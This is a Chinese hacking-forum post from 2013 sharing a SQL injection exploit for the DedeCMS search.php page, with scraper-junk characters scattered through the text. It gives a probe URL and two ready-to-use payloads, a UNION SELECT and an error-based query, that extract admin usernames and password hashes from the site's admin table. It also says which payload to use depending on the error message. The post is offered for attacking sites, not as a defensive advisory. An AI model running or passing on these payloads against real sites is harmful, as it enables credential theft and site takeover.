转载不加作者名的没JJ! s; P, B5 f1 P5 ]
9 K( h- L6 V. C! G `$ C哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。& U; y: k3 \% a$ q
* }% x) ], O' \/ n. `既然已经发出来了,我就把我自己搞的exp发下吧。。唉。4 `7 C8 q6 T3 b% `9 u0 ]
5 g# g: h. p- n* l8 m! j6 O
我一般是这样测试的:% j6 J9 b' `/ m1 B$ T. j$ k; h8 T
/ }0 t# q8 ~# F' q0 v5 e& h- {
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a. a( Q3 v6 |# e3 f, e
# |/ _% |" e6 s) @8 W
转载不加作者名的没JJ
w4 e! I3 h3 M U$ m' O. j$ f/ E& S: D+ Z9 \$ O4 t; U
作者:鬼哥
$ Q5 [4 o0 a X' D' N& Z# k6 F- }% e
5 M- {: ]/ F( c- x! Z8 {# P
+ L& C0 O; g: {; u5 h9 J看结果如果提示) w+ c0 X, E; l5 B
3 }0 Q5 s# x- \9 ^0 LSafe Alert: Request Error step 2 !6 z! v* I' Z; A
% I# X! [1 I" [, ^2 s4 H( u* E% g' `
那么直接用下面的exp! y5 ?( [3 N/ A/ D: W0 m5 {5 B
9 c( A8 r% D2 U& y
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a& c5 Y/ u# _$ O
% Y! S- ^0 T4 \
- I$ l1 C/ M* I; Y! h: N看结果如果提示- f. d$ |6 l2 [( g8 p
& P! e& h) |1 y, h5 Q5 ]6 ySafe Alert: Request Error step 1 !
5 a. i0 t; R N" [0 L; D3 ^1 i: q. l; f+ x, \% T) D: ]/ X
那么直接用下面的exp
" u1 H; w( F8 Z6 r9 \) |$ W H4 t% c X2 [6 @
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
% Y6 \" i/ ~9 _% N8 E" W
h* I6 ~+ @% J) b: A5 a- R8 u( I9 G+ f. A
如果正常显示证明漏洞不存在了。: P, X: _* h( v' f4 @" r# h
1 w/ M: @* @, p( w2 C& _! ]
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对